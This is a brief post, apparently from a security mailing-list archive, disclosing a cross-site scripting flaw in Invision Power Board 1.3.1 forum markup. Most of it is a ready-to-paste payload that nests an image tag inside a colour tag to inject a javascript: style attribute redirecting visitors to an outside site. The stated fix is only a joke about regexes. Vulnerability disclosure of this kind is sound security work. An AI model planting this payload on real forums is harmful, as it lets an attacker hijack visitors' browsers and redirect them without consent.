<<< Date Index >>>     <<< Thread Index >>>

Invision Power Boards 1.3.1 FINAL XSS Exploit




Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');")
 [/color]
Fix:
I'm not good at regexes :)